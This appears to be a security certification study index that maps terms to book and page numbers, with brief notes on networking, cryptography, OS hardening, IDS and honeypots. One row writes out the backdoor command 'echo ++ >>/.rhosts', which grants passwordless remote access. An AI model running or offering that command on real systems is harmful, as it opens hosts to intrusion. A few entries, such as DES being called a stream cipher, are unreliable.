cron                                   6    79     schedule daemon (crond); starts an action (in the background) at a preset time; /etc/crontab --> crontab file in user home dir (for users)
cross forest trust                     5   42,43   created manually; transitive; two way or one way trust == Cross forest trust - all server 2003, no replication, transitive 1 or 2 way == Forest - inside one forest all domains trust each other by default == Forest - cross forest trust must be created manually == Forest - cross forest trust is transitive, so all domains in the 2 forests trust == One-way cross forest trust - one side trusts the other side == No cross forest replication in cross forest trust == Forest - inter domain replication in the same forest
cross over                             1    24     the primary use of it is to connect an external router to a firewall; +tx to +rx and -tx to -rx
cross site scripting                   2   265     poor input validation; include javascript, inline frames; steal cookies; affects HTTPS, HTTP
Cross Site Scripting                   5   187
cross site scripting defense           2   267     avoid reflecting user i/p back to the web site; filter, validate, translate & encode
Crossover Error                        2   145     FAR and FRR are equal
Cryptanalysts                          4     6     those who dedicate their lives to breaking ciphers
cryptanalytic                          2   133     time memory trade off made by Philippe
Crypto vs. Stego                                  4   35    crypto provides confidentiality but NOT secrecy
crypto attacks - how can be guarded               4   74    by: 1- keeping plaintext secret or deleting it if not needed, 2- preventing mechanisms that allow the attacker to encrypt random msgs using your secret key
Cryptographer                                     4   6     who creates encryption algorithms
Cryptography                                      4   6     means hidden writing
Cryptography - Detection                          4   36
cryptography - applying it to the network         4   80
Cryptology                                        4   6     generic term for the study of both cryptography and cryptanalysis
cryptosystem                                      4   50    main goals: confidentiality, integrity of data, authentication, and non-repudiation. There is NO availability
cryptosystems types                               4   26    3 general types: Secret Key (symmetric), Public Key (asymmetric), Hash (one-way transformation)
CS (code Segment)                                 2   24
csdiff.exe                                        5   315   free third party tool to compare files
CSMA/CD                                           1   11
CSS - (Contents Scrambling System )               4   8     encrypts data on DVD
cubic time                                        4   51    O(n^3)
cubic-time algorithm                              4   51    an example of intractable problems, and could take thousands of years to be solved
cumulative hotfixes                               5   57    fix many issues at once
cygwin                                            6   7,8   makes Windows Linux-smart (or "Linux aware") and allows some unix software to run directly in Windows (all versions except CE); you must have access to the source code (can compile server software)
cygwin base install                               6   9     gives you a nice but small selection of Linux shells and commands, and you can add more programs later (by running setup.exe)
cygwin commands                                   6   11    such as dig (domain name specific), which is better than nslookup; can also use the GNU development tools to write Linux and Windows code; also we can use it as an X server
cygwin functionality                              6   11    install the Linux libs and programs it needs in cygwin to communicate with a service on a native Linux server
cygwin isn't linux                                6   8     has some Linux commands and utilities, and it isn't a Linux emulator for Windows, so it is a "half-way" step to Linux
cygwin power                                      6   10    adding powerful scripting to Windows (there are some things Windows can't do easily or can't do at all)
cygwin setup.exe                                  6   8
cygwin uses                                       6   8     it can be an entire environment of development tools that have a lot of power (as in developing software for the GNU project) and allows Windows developers to do some neat advanced programming in Windows
DAC (Discretionary Access control)                2   109   optional, user can manage it, ex: user name & pass; user can give the pass to another without admin permission
DACL list of permissions on file or folder NTFS   5   90    DACL is always enforced, no matter from where the file is accessed
Database Hardening                                2   221   update, patch, isolate, restrict access (users can't add or drop tables)
Data classification                               2   104   top secret, secret, confidential, SBU, unclassified
Data Custodian (custody)                          2   103   the admin responsible for managing access
data encryption and access control                5   18    for Windows Mobile: Checkpoint, Credant, SafeBoot, Trust Digital
Data execution prevention                         5   7     prevents execution of code in areas of memory that aren't intended to hold executable data
data normalization                                3   183   IDS takes the data to a baseline before analysis
data over cable interface specification (DOCSIS)  1   18    ITU; cable television companies provide internet access over existing TV cables
Data Owner                                        2   103   the creator of the data, or who has the authority over the data, like C-level
David Kahn                                        4   7
dcredit=$                                         6   60    minimum no. of digits is $; in /etc/pam.d/system-auth in the pam_cracklib argument
dd                                                6   68    backup command: dd if=<input-file> of=<output-file>; it offers no security prevention
dd                                                6   68    backup (bit-by-bit image), reduces backup time; can be conducted: locally, via scripts, over the network
dd for windows                                    5   75    creates image files; can search the image; can be burned to CD/DVD
DDOS                                              3   29    attacker recruits zombies; tools: TFN, Trinoo, Stacheldraht, TFN2K
Deadhat virus                                     2   41    compromises MyDoom-infected machines, removes MyDoom and terminates antivirus
debug programs - used in DLL injection & Cain     5   125
decoding IP header                                1   152
decoding packets                                  1   150   five tips for decoding packets
decoding TCP header                               1   160
decoy account                                     5   176
Decryption                                        4   6     is the process of transforming an encrypted message back into its original plaintext or cleartext
DeCSS                                             4   9     decrypts data on DVD
dedicated lines                                   1   17    T1, T3, E1; allowing n sites to connect will need n+1 links
deep inspection                                   3   181   header and data; slow; anomaly analysis, protocol analysis
Defacement monitoring                             2   270   alerts when unauthorized changes are made to parts of a web application; uses a file integrity checker
default domain policy GPO                         5   159   applied to everyone at the top level of the domain
default domain policy GPO                         5   160   updated to other domains in 15 minutes, and workstations update in 90-120 min
Delegation authority - AD                         5   114
Deny=$                                            6   62    in /etc/pam.d/system-auth in the pam_tally module; it equals the number of attempts made before account lock
DEP                                               5   7     Data execution prevention
dependencies service                              5   194
DES - Data Encryption Standard                    4   57    2^56 key size, 64-bit (8-bit for parity & 56 key) block cipher. Fast, uses 16 rounds
DES - Data Encryption System                      4   22    it's a very common stream cipher; it uses 64-bit blocks and a 56-bit key
DES - four operation modes                        4   57    it has 4 operation modes like any block cipher: ECB - (Electronic Codebook mode), CBC - (Cipher Block Chaining mode), CFB - (Cipher feedback mode), OFB - (Output feedback mode)
DES advantage                                     4   59    the DES algorithm is not a group; this means that multiple DES encryptions are not equivalent to a single encryption, so multiple encryption will increase the security
DES is not a group                                4   59    this means that multiple DES encryptions are not equivalent to a single encryption. THIS IS A GOOD THING
DES weakness                                      4   58    not secure due to its key size, and not because the algorithm has been broken
DES - Meet In the Middle attack                   4   60    only twice the work of brute-forcing DES. Attacker has the cleartext and ciphertext
destructive plan - OPSEC                          4   246   should be implemented to avoid aggregation of information that is no longer useful or not in use
DFS (Distributed file system)                     5   10    enhanced in 2003 R2; allows users to access shared files
Dial-in Authentications                            2   114   TACACS, RADIUS
DIAMETER                                           2   113   TCP based replacement of RADIUS
Dictionary attack                                  2   123   fastest method; countermeasures (policy: written rules; filter: technical mechanism)
DID                                                2   6
DID - Approaches to DID                            2   14    Uniform protection, protected enclaves, information centric, threat vector analysis
Diffie-Hellman Key Exchange                        4   30    Diffie-Hellman is used only for key exchange
difok=$                                            6   61    no. of characters that must differ from the old passwd; in /etc/pam.d/system-auth in the pam_cracklib argument
Digest mode Authentication                         2   248   uses one-way MD5; data sent in the HTTP header
Digital certificate                                4   123   X.509 certificate
Digital Substitution [Decryption]                  4   16
Digital Substitution [encryption]                  4   14
Direct access                                      5   12    Win7, Win2003R2; allows remote users to access the enterprise without worrying about VPN
Direct Evidence                                    2   187   what the handler actually saw
directed broadcast address                         1   62    passed by the router
Directory traverse attack                          2   251
diruse.exe                                         5   325   can monitor a folder; if it exceeds the limit it will alert
diruse.exe /s                                      5   313   show directory and all subfolders
discrete logarithm problem - Intractable problem   4   54    a^x mod n = b (mod means remainder); very difficult to solve; used by: El-Gamal, Diffie-Hellman, Schnorr signature scheme, Digital Signature Algorithm (DSA)
Disk encryption                                    4   130   another use of PKI is to create certificates to be used for disk encryption
DLCI (data link control identifier)                1   65    10 bit layer 2 address, frame relay
DLL (Dynamic linked library)                       2   239
DLL injection                                      2   130   Cain process to extract pass hashes
DLL Injection Attack                               5   125   requires the debug programs right; inserts a thread into the address space of the target process
DMCA                                               2   80    Digital Millennium Copyright Act
DN - Distinguished Name                            4   120   the person or entity who wants the certificate provides their identification in the form of a DN
DNS                                                1   74    domain name system
DNS - authoritative dns server                     1   74    responsible for a domain and has a list of sub domains
DNS - recursive query                              1   76    client asks the server to do all the dns lookups for them and send the final reply to the client
DNS - split dns                                    1   78    people receive different IP answers depending on whether they are inside or outside
DNS - top level domains                            1   73    generic and country code +
DNS basic                                          6   100   when a user needs to look up a FQDN, the system requests the info from a predefined DNS server; DNS saves the cache normally for 24 hrs
dns cache poisoning                                1   77    poisoning a dns cache so clients are directed to the wrong places
dns denial of service                              1   77    flooding the dns server with queries
dns footprinting                                   1   78    use zone transfer and reverse lookups to learn about the network; solution = limit zone transfer, split dns
DNS query                                          1   75    local dns server >> root dns server >> top level dns server
dns query type                                     1   75    GetHostByName - GetHostByAddr
                                                                   for well known sites higher TTL value to avoid overloading,for sites changing a lot lower TTL value because address
Dns TTL                                              1     75
                                                                   change frequently
domain controllers                                   5     32      server to manage active directory database
                                                                   are stored in active directory database and replicated to all domains == domain group policy-at startup/shutdown-pc
domain group policy object                           5    158      download computer conf. == domain group policy-at login/log off-pc download user configuration == 90-120 min
                                                                   for any policy change
domain network in network location types             5    213      used to access domain controllers for computer's active directory, prifile select auto when active directory detected
Double DES                                           4     60      doesn't increase the effective key size significantly, 2^57 key size
downstream liabilty                                  3      53     means to try to protect other by filtering your outgoing traffic
driver rollback                                      5      81     related to system restore
DropMyRights                                         2      36
DROPMYRIGHTS.EXE                                     5     179     tool to run as adminstarto=RUNAS.exe
DRP (disaster recovery plan)                         2      85     Recovery IT System(data center,business (operation,location,processes)),tactical thing
DSA - digital Signature Algorithm (DSA)              4     54      an algorithm that uses the intractable problem of discrete algorithm for finite fields
DSL                                                  1      18     low cost,use exisiting phone lines,high speed
dsniff,ettercap                                      1     135     a tool used to sniff inside a switched network enviroment
dummy camera                                         1     243     preventive control
dumpeventlog.vbs                                     5     329     dump the event log in text file and sort it
dumpEvt                                              5     284     dump event logs into plain text AscII,somarsoft
dumpevt.exe                                          5     328
dumpReg                                              5     284     dump the registry to plain text AscII,somarsoft
Dumpsec                                              5     284     can dump ntfs permissions and audit things to text file,somarsoft
dumpusers.exe                                        5   169,170   create null session,
EAP (Extensible Authentication Protocol)             5     229     for vpn if smartcard required use EAP
                                                                   authentication protocol provides network authentication. EAP used vary according to the clients OS, the back-end
EAP- Extensible Authentication protocol              4    167
                                                                   authentication systems (Windows: Active Directory, LDAP, RADIUS)
EAP over RADIUS                                      4    168      the Authenticator uses EAP-over-RADIUS to pass the supplicant request to the Authentication Server
EAPOL - EAP over LAN                                 4    168      EAP over lan(EAPOL), the supplicant uses EAPOL to communicate with the Authenticator
ECB - (Electronic Codebook mode)                     4     22      two identical plaintext blocks generate the same cipher block; susceptible to brute-force attack
ECC - Elliptic Curve Cryptosystem                    4     69      can be used to support both encryption/decryption and digital signatures; high security even with small key length (higher strength per bit), high-speed implementation, low processing power
ECDLP - ECC intractable problem & sol                4     70      y^2 = x^3 + ax + b; the Pollard rho method is the best-known solution for ECDLP
ECDSA - Elliptic Curve Digital Signature Algorithm   4     55      uses the difficulty of solving the discrete logarithm problem as applied to elliptic curves (intractable problem)
echo ++ >>/.rhosts                                   3     16      allows all users to connect remotely without a password: "accept connections from any user on any machine"
ECN (explicit congestion control)                    1    105      the last two bits of the reserved field and the first 2 bits of byte 13 in the TCP header; CWR = Congestion Window Reduced, ECE = ECN Echo
EDGAR DB                                      4   257    at the Securities and Exchange Commission; you'll find annual and quarterly reports, goldmines of information.
Edgar search                                  4   259    will provide documents related to the company
Edit security template                        5   146    using notepad or MMC.exe
EDR - enhanced data rate bluetooth spec.      4   150    improves Bluetooth rates up to 2.1 Mbps
ECC - Elliptic Curve Cryptosystems            4    55    provides higher speed, lower power consumption, and tighter code
EER (Equal error rate)                        2   145    FAR and FRR are equal
EFS (Encrypted file system)                   2   116    MS
EFS (Encryption File System)                  5   126    uses AES 256-bit > encrypts the AES key using the certificate's public key > encrypts the private key with the password == protects from Linux boot, stolen backups == in NTFS, Windows 2000 or later, USB, removable media
EFS (Encryption file system) (version)        5   128    different keys per OS version
EFS best practice - SYSKEY.EXE tool           5   131    to require a passphrase at boot-up
EFS recovery certificate                      5   129    PFX file encrypted with a password
egress filtering                              3    53    applied to outbound traffic; very useful as an intrusion detection system (a virus trying to connect out)
egress filtering                              3   279    excellent way to detect systems infected with malicious code because they often use spoofed IP addresses
Elliptic Curve Diffie-Hellman                 4    55    uses the difficulty of solving the discrete logarithm problem as applied to elliptic curves (intractable problem)
Elliptic Curve El-Gamal                       4    55    uses the difficulty of solving the discrete logarithm problem as applied to elliptic curves (intractable problem)
Elliptic Curve Schnorr signature scheme       4    55    uses the difficulty of solving the discrete logarithm problem as applied to elliptic curves (intractable problem)
E-mail - decrypting                           4   111
E-mail - encrypting                           4   109
E-mail - sign confirming                      4   113
E-mail - signing                              4   112
Emergency recovery - BitLocker                5   140
employee issues - OPSEC                       4   239
employment agreement                          4   241    Non-Competition, Non-Solicitation, Non-Disclosure Agreement (NDA), Intellectual property
ENC - (Digital Substitution) [encryption]     4    14    it's a digital substitution, NOT encryption
Encoding                                      4   none   the difference between encoding & encryption is that the key in encoding is well-known, but in encryption it is secret.
Encryption                                    4    6     coding a message in such a way that its meaning is concealed
encryption applied to application layer       4    81    APOP, AFS, Secure Shell; APOP protects the authentication exchange, not the e-mail message itself
encryption applied to network layer           4    82    VPN
encryption applied to transport layer (TLS)   4    81    the TLS protocol provides privacy and data integrity between two applications; it is composed of two protocols: record and handshake
encryption file system best practice          5   131    strong password, smart card, syskey, encrypt folders not files
encryption file system win2000                5   130    the private key is in the profile of the local admin
endian                                            3    32     which end of a multi-byte value holds the most significant byte: big endian, first (left); little endian, last (right)
Enrollment                                        2   145     the process by which a biometric is initially recorded
Equal error rate                                  2   145     FAR and FRR are equal
escort from restricted area                       1   237     employee escort:disable all his access,take badge,parking decal,escorted by guard or at least two managers
ESTABLISHED                                       3    58     third step in the three-way handshake
ethereal / wireshark                              6   193     bring sniffing and packet analysis to a new level; first GUI (needs X Window to run) --> wireshark, or from the Applications menu, then Internet, then Network Analyzer
Ethernet                                          1    11     only a single node should transmit a frame at a time
Ethernet                                          1    11     baseband, shared media, most common layer 2
Ethernet frame                                    1    11     chunk of data transmitted by machines; a single machine should transmit 1 frame at a time
Ethertype                                         1    68     the field that indicates the higher-layer protocol in an Ethernet frame, e.g. IP = 0x0800
ettercap                                          1   137     attacker sends false ARP replies to associate his MAC address with the target host
EUI (extended unique identifier)                  1    83     FFFE is inserted into the middle of the MAC address to build the IPv6 interface identifier
evacuation practice                               1   219     take drills seriously, take action against those who ignore alarms, employees should be trained in cross roles
evacuation Procedures                             1   218
evacuation roles                                  1   220     safety warden,meeting point leader,searcher,stairwell/door monitor,special needs assistance
evacuation route posting                          1   218     signs,multiple copies of evacuation procedure
Event                                             2   156     observable occurrence in a system or network (system crash, packet flooding on the network, system boot sequence; an authorized logon is an event); some events make an incident
event log                                         5    318
Evidence - Admissible                             2    182    reliable,relevant to the case
Evidence integrity                                2    186    make hashing
exchange server 2007                              5    290    graphical management tool wrapper for powershell
exclusive log monitoring                        3   212    a list of keywords or phrases that define events of interest; entries that don't match ---> alert
EXE program infector                            2     24    affects EXE files only
exec.vbs                                        5     55    executes a process on a remote machine without going to the PC; executes batch files; included in the Resource Kit
Exploration Air                                 2    250    default web page in IIS4 caused a DoS and increased CPU to 100%
exponential O(2^n)                                4     51    an example of intractable problems.
exponential-time algorithm                        4     51    an example of intractable problems. Could take longer than the universe to be solved.
exposure factor (EF)                            3    269    the percentage of loss a threat event would have on an asset, in terms of 0 --> 100% loss to the asset
extended perm                                   6   41,42   setuid, setgid, sticky bit; specified through a fourth (leading) digit in chmod
external mode                                   2    126    can be extended with custom routines written in C code
External PKI                                      4    118
Facial thermograms                                2    145    sense the heat in the face caused by the flow of blood under the skin
factoring integer problem - Intractable problem   4     53     difficulty of factoring a large integer into its two prime factors; hard problem solved by trial & error; used by RSA
faillog -u <username>                      6    62     lists the current number of bad logins; with -r will unlock the account; with -m -l will turn off locking on lock-out of a specific user
faillog -u <username> -m -l                6    62     will turn off locking on the lock-out of a particular user
faillog -u <username> -r                   6    62     will unlock the account
False Accept Rate                          2   145     the percentage of readings in which the system accepts an unauthorized user
False Arrest                               2   181
false negative                             3   171     a real attack reported as OK; this is bad: no alarm is generated for the analyst; worst case
false positive                             3   171     IDS generates an alarm for benign activity; burden on the admin
False Reject Rate                          2   145     the percentage of legitimate users falsely rejected; the system fails to accept a genuine user
FAR (False Accept Rate)                    2   145     the percentage of readings in which the system accepts an unauthorized user
fat and fat32                              5    88     no auditing ,no access control ,no fault tolerance
fc.exe /                                   5   315     cmd tool,print difference between files
FDA                                       2   178     regulates drugs
FDCC                                      5   148     Federal Desktop Core Configuration
fdcenter.org                               4   257     for Private foundations
FDDI (fiber distributed data interface)   1    14     two rings: primary ring, secondary ring for redundancy; data in the secondary ring flows in the opposite direction
FDDI (lack of MAU)                        1    14     can be a physical ring or a physical star, but a physical ring wouldn't allow bypassing troubled areas (disconnected ports, faulty cables)
FDDI beacon frame                         1    14     when a system doesn't see a token for a specific time it sends a beacon.
FDDI validation against self diagnostics  1    14     isolates the system with a faulty card that can't diagnose itself properly
FDIC                                       2   178
features in server manager                 5   199
fedora                                     6    21     Red Hat Linux; desktop & server (chosen by installer); (i386, x86_64, powerpc, alpha, sparc) no amd64; 25 languages; RPM (for package management using yum); firewall included and enabled by default
fences                                     1   242     deterrent controls
FHSS - freq hopping spread spectrum        4   150     hops between 79 different channels in 2.4GHz; used in Bluetooth; provides a high degree of interference immunity.
File Infectors                             2     22    attach itself to existing prog (.com,.exe)
file integrity checkers                    3    211    calculate hash, then compare
file sharing                               6     95    NFS, samba
file system                                6     27    actual location of the information
file system structure                      6   27,28   /bin, /usr/bin , /usr/local, /etc, /dev, /var, /tmp, /home, /mnt, /usr
filtered port                              3    125    might be listening but nmap can't tell for sure
final report                               3    286    interim report+safeguard selection+risk mitigation analysis+cost benefit analysis+recommendation
find </> -name <file_name>                 6    224    to search for files within a file system
Finger                                     3      9    can return information about users on a particular system; used for reconnaissance; service port 79 TCP
finger command                             6    125    used to display the UTMP log file.
finger -l @target                          3     20    all information about a user: home dir, shell, mail status
FIN-WAIT1                                  3     58    a host wants to terminate the connection
FIN-WAIT2                                    3    58   both sides finished communication
fire types                                   1   223   combustible (paper, wood): type A (triangle) - liquids: type B (square) - electrical: type C (circle)
firefox add-n-edit cookies                   2   276
firefox tamper data                          2   277
firewall                                     3    48   controls what is allowed across some point in a network as a mechanism to enforce policy
firewall "wfas" keeping blocking/unblocking  5   217
firewall and ids                             3    65   using a log to know there is a virus infection inside your network
firewall as an IPS                          3   230   it's a real intrusion prevention system, but it's static.
firewall benefits                           3   50    reduce risk, increase privacy, filter communication, encrypt communication, records (logging), noise filter
firewall bypassing protection                3   110   audit,proxy firewall,IDS,Ips,educate users on social engineering
firewall bypassing techniques                3   103   worm,wireless,modems,tunneling,vpns,social engineering,home laptops
firewall default rule                       3    52   default deny: restrictive; default allow: permissive
Firewall for Windows with Advanced Security 5    12   manageable through Group Policy and NETSH.exe
firewall implementation                     3    48   dedicated appliance, hardware or software in a network device, software on a computer
firewall plus something                      3   251
firewall rules (chain)                      6   179   FORWARD, INPUT, OUTPUT
firewall's leak                              3    51   the attacks that bypassed the firewall
firewalls objectives                         3    48   reduce risk,increase privacy,enforce security policy
firewalls shortcomings                      3    51   dial-up and VPN may bypass them, organizations may depend only on them, attacks on the application layer
FISMA                                        5   148
footprint web Authentication                2   249   cookie, SW or signature, client IP --- easy to break
forensic toolkit                            5   284   Afind, Hfind, Sfind, Filestat and hunt; file system analysis; list files accessed without modifying them
forensic toolkit                            5   284   by Foundstone; shows hidden files, alternate data streams
Forest & trust                              5    39   one or more AD domains that replicate portions of the database and which all trust each other
Forest & trust - two way transitive trust              two domains trust each other
Forest & trust _ Inter-domain replication         39
Fork() bomb                                 3    29   DoS attack: calls fork() to create a new process like the original, done repeatedly
Form based Authentication                   2   248   uses HTML form fields to request authentication; password sent in clear text
Form Submission Action                       2   227   GET,POST
foundstone                                  5   284   forensics toolkit, Ntlast, Fport, scanline
fport                                       5   284   prints a table of TCP/UDP connections and the executables attached to them; Foundstone
FQDN                                        1    75   fully qualified domain name
fragmentation attacks                        1    53   send malicious commands fragmented,send too small fragments,send overlapping fragments
Frame relay                                  1    17   packet switching,less cost
FreeBSD                                     2   125   employs stronger password hashing
FRR (False Reject Rate)                      2   145   the percentage of legitimate user falsely rejected
FRS (File Replication Service)              5   292   domain controller multi-masters replicate scripts to each other using it
ftp                                         1   100   file transfer protocol, RFC 959
ftp - active and passive               1   102   in active mode the server initiates the data connection; in passive mode the client initiates it
ftp - anonymous ftp                    1   100   no predefined username and password; threat of becoming a warez site; prevent GET with an authoritative account
ftp - blind ftp                        1   101   security through obscurity; prevents one user from seeing the names of files uploaded by other users
ftp - PORT command                     1   101   can ask the FTP server to initiate a connection to a specific port and IP address; used to scan a network through the server
ftp command channel/control channel    1   100   the user authenticates and uses commands in this channel to start transferring files; port 21
ftp data channel                       1   100   here the actual data transfer happens; port 20
ftp logs                               6   140   WU-FTP tracks incoming connections; Solaris, IRIX and other variants typically log only FTP connections. Logs go into the syslog file: (date time hostname program name : msg sent to syslogd)
ftp logs                               6   140   Notice: only the FTP connection is logged, not what files were uploaded or downloaded.
FVEK (Full Volume Encryption Key )     5   134   128bit AES or 256 AES,encrypt decrypt the volumes of bitlocker
GenI honeynet                          3    85
Generic.inf new security templates    5   146
GET                                   2   228   user data are appended to the URL
getmac.exe                            5   283   retrieves the hardware address of remote computers
getty service                         6    74   allows users to begin logging into the system
Gigabit                               1    11   designed for large frames; susceptible to too many small frames
GLBA                                   2   178
global catalog GC                     5   39    portion of AD that is replicated across domain boundaries; it is the part of the DB replicated between domains; forest schema is all possible types of objects & their attributes in the domain; forest configuration naming context (sites, subnets, intersite replication links); forest schema & configuration are replicated & synced in all the forest
global catalog server                 5   39    special domain controller which replicates across domain boundaries
global group                           5   97    can only contain members from the domain where created == contain users of the same jobs,shared needs
Global vs. local users and groups           33
Goals of Cryptography                 4   12    CIA, Non-repudiation
gopher                                 3   123   port 70 tcp
gpasswd                               6   47    used to assign a password to a group: gpasswd group --> add a password to a group; gpasswd -a user group --> add a user to the group; gpasswd -d user group --> delete the user from the group
GPMC Group Policy Management Console  5   160   GPMC: a download for XP/2003, built in by default in Vista/later; used to configure domain GPOs in the forest
GPO administrative templates          5   166   ***********2 pages***********
GPO Group Policy Objects              5   45    special logon scripts which, when run, can configure almost anything on the computer == Group policy configures each security option in Win 2000 & later == Group policy is the most important data replicated between domains == Group policy runs when the computer boots & is checked every 90 to 120 min == user GPOs run at login & the PC checks them every 90 min == in Active Directory, applied to sites, computers & OUs == Group policy: how to open & edit it on the local PC or in Active Directory
GPO local (Group Policy Object)       5   153   MMC snap-in; current PC settings except NTFS and registry key ACLs; applied automatically
GPO password policy                       5   162   max-length:127,minimum password length:15 == password policy&recommended settings(use passphrase)
GPO scripts ( Startup/Shutdown scripts)   5   156   startup/shutdown run in computer context,logon/logoff run in user context
GPO security options recommend            5   165   ***********3 pages***********
GPO settings checklist                    5   161
gradual structural weakening             1   228   a result of a series of lesser events
grep <string> <file>                      6   225   to perform search of data within files.
group policy                             5    44   password policies, account policies, audit policies, NTFS, Kerberos
group policy management console           5    46
groupadd                                  6    45   create a new group -->groupadd grpname
groupdel                                  6    45   delete a group --> groupdel grpname
grub.conf                                6   85    one type of boot loader; add one line at the top of the file to set a password on the boot loader (password --md5 <md5hash>)
guest account disabling                   5   173   net user password /active:no /time: ,
guest os                                  1   177   the os installed on a virtual machine
Guideline - Definition                   2    65   suggestion (recommendation), not mandatory, assists
hardened honeypot                        3    75   to differentiate between legitimate and illegal traffic: anyone who connects to it is an attacker
hardening tools                          6   187   will make some or all of the recommended changes to make your platform secure; free tools
Hardware key store                        4   121
Hash Algorithm                           4   32    effective due to the extremely low probability that two different plaintexts have the same hash value
Hash Function                            4   32    one-way algorithm; the key length is the hash length; like MD2, MD4, MD5, RIPEMD-160, SHA-1, SHA-2
heap memory                              3    32   used for arbitrarily large buffers; the resulting pointers are called procedure; harder to exploit by buffer overflow
Hearsay evidence                          2   187   3rd party testimony -I heard from some one that
heat sensors                             1   223   like a thermometer; operate when there is a rise in temperature
heuristic (guiding) anti-virus           2    43   searches files looking for malicious-looking code routines; doesn't depend on signatures
hexadecimal                              1   148
HFNETCHK.EXE tool
HIBERFIL.SYS                              5   132
HIDS                                     3    22   distributed as software agents that can be monitored from a central location for a large enterprise
hids advantage                           3   215   not blinded by encryption; identifies inside attacks against the system; details inside the network, not the perimeter only
hids challenges                          3   216   ………
hids developments                        3   219   monitor application level, protect web sites, appliance platform support (routers, switches), merging with HIPS
hids recommendations                     3   218   can be used to identify attacks & identify policy violations
highlighter                              5   316   free comparisons between files, from Mandiant
HIPAA                                     2    59
HIPAA                              2   178   health insurance portability and accountability ACT of 1996
hips                               3   232   hips tools use combination of signature analysis and anomaly analysis to identify attacks
hips advantage                     3   233   the ability to STOP attacks from being successful, +all the adv of HIDS
hips application behaviour         3   236   vendor selects supported apps and records the intended functionality of the app in normal use
hips challenges                    3   234   false positives, implementation & maintenance, limited app support, more system resources, limited nodes per management console
hips details                       3   232   stop known & unknown attacks; system call interception; monitor traffic on the network; file integrity & app behavior
hips developments                  3   238   zero-day vulnerability protection, application shielding behavior
hips management console            3   235   max about 3000 nodes per console
hips recommendations               3   237   document procedures, develop management policy, don't blindly install s/w updates, don't rely solely on HIPS.
hips -zero day protection          3   238   zero day protection build into hips
Histogram                          4   37    a graph that represents the number of occurrences of data in a given distribution (the frequency of characters varies greatly)
HMI - human to machine interface   4   151   the ability to communicate with the machine to enter inputs and commands; in Bluetooth, the lack of an HMI results in fixed PIN selection for devices like headsets ('0000' or '1234').
honey token                        3   185   labeling information with unique keywords,project id
honeyd                             3    83   can design any honeypot as a specific OS, using the nmap and Xprobe databases
honeynet project                   3    85
honeypot                           3    72   is an information system whose value lies in unauthorized use of that resource
honeypot                           3    72   dedicated server,state machine,service,virtual server,honeytoken
honeypot advantages                3    76   insight (tactics, motives, tools of attackers), reduced false positives and false negatives, additional defence in depth
honeypot checklist                 3    89
honeypot deploying                 3    87   start with low-interaction, unused address space, monitor the honeypot out of band
honeypot disadvantage              3    78   fingerprinting, limited view, resource burden
honeypot fingerprinting            3    78   attackers use the identity of a honeypot to throw off admins by spoofing traffic from legitimate hosts to the honeypot, feeding the honeypot incorrect info
honeypot liability                 3    73   civil issue: an attacker may harm other networks from your honeypot
honeypot types                     3    80   purpose,location,scope,interaction
honeytoken                         3    72   a single file with special attributes
host os                            1   177   the main os that runs virtual machine
hosts.equiv file                   3    9    allows users to use r-commands; includes machine and local user account; without password
hotfix                             5   57    small program that updates a few OS files with updated versions == hotfixes patch one security hole by replacing one or more system files == fix a single problem ==
hotfix newsfeed                    5   58    sites::sans,microsoft,securityfocus,packetstormsecurity.nl == easiest way to stay on top of new patches
HP sitescope                       2   271   web service monitoring tool.
Hping3                             3   114   like ping using tcp crafted packets, used to assess firewalls
Hping3 features                             3     116     test firewall rules,net performance,fingerprint os,audit stacks,transfer files,check if a host is up
HP-UX pkg manager                           6     167     swinstall,swremove,swverify
HTML form example                           2     229
HTML Forms                                  2     227     take user input ,dynamic (java script)
HTML(Hypertext Markup language)             2     226     tool like DreamWeaver
htr buffer overflow                               5     241     requires *.htr mapping on Win 2000
HTTP                                        2     222
http 400 bad request                              2     271     something abnormal in the header; indicates scanning or an attempt to exploit a vulnerability
http 403 forbidden                          2     271     usr attempt to load content not authorized to do
http 404 not found                          2     272
http 500,501,503                            2     272   server error or time out,
HTTP Authentication                         2     247   user Authentication sent in HTTP header,Basic Authentication,digest Authentication
HTTP Header / Metadata                            2     222   request or response: browser/software version, content types, languages & protocols accepted, cache
http logs                                         6   130,131 most web servers maintain logs which track the originating IP address of each connection. File entries: originating_IP notused username date&time Actual_text_of_the_request error code (200 ok, 404 file not found) no_of_bytes_returned_to_the_browser
HTTP Methods                                2     217   GET,POST,HEAD,PUT
HTTP Status code                                  2     222   200 -> success, 300 -> redirection, 400 -> bad request, 500 -> server error
HTTP Status code                            2     225   BAD request(401unauthorized,403forbidden,404not found ,etc),500range:Server Errors or time out
HTTP Transactions                           2     224
http tunnels                                3     106   p2p programs use it to send data,stunnel can be used for this,port80,port443
humidity detectors                          1     227   a detective control used to detect water/flood ,used for water vapor
HVAC (heating, ventilation, air conditioning)     3     154   HVAC systems may use an active phone line; skip them when running a war dialer
Hybrid attack                               2     123   Hello==he110
Hyper-V (HyperVisor)                        5      15   built in server2008 -64bit only,is virtual machine system
ibm iss inline protection                         3     250   full-on NIPS; all malicious traffic blocked
ibm iss inline simulation                         3     250   monitor-only mode; provides live monitoring to tune your policies before live implementation
ibm iss passive mode                              3     249   G series, like an IDS; blocks malicious traffic by sending a TCP RST to the offending connection
ibm iss proventia                           3     249   nips, G-series provide high speed deep inspection, M series provide unified threat management
ibm iss proventia G series                  3     249   throughput: from 100mb to 2gb, Modes: passive monitoring, inline simulation, inline protection
ICACLS.exe                                  5      90   built in 2008/vista,modify ntfs permissions
ICACLS.exe                                  5     117
icmp payload                                1     119   the header of ip packet+ 8bytes of ip payload which include the source and destination ports
ICMP (internet control message protocol )   1     118   icmp is encapsulated in ip packet,connection less,error reporting,network troubleshooting
icmp common types                           1     120   typ8 echo req,typ0 echo reply,typ3 destination unreachable,typ5 redirect,typ11 time exceeded
Icmp error packets                          3      59   issue to state firewalls because a legal packet can't pass,udp-->port unreachable
icmp rate limiting                          3     128   set limits on how many icmp packets they are willing to send out during a certain time
icmp security issues                        1     122   covert data channel,denial of service,map a network
id command                                  6     49    show effictive username and id, user's groups and their id (primary and secondary groups)
Identity                                        2     106   who you claim to be, done by authorization, authentication
IDS                                             3     166   alarm system, needs an incident handler, not a low-maintenance tool
IDS - modern ids                                3     182   use a combination of deep and shallow inspection
IDS - What is IDS not?                          3     167
IDS alerts                                      3     171   true positive, false positive ….
ids blade                                       3     207   module inserted into the switch, custom hardware
IDS EOI                                         3     171   an event of interest, can be anything the analyst wants to identify with the IDS
ids evasion                                     3     183   attackers change data characteristics to pass the IDS, de-normalize traffic
IDS load balancer                               6     197   to distribute the packets on your network to multiple identical IDSs, if you've tuned your IDS for speed and the system still can't keep up
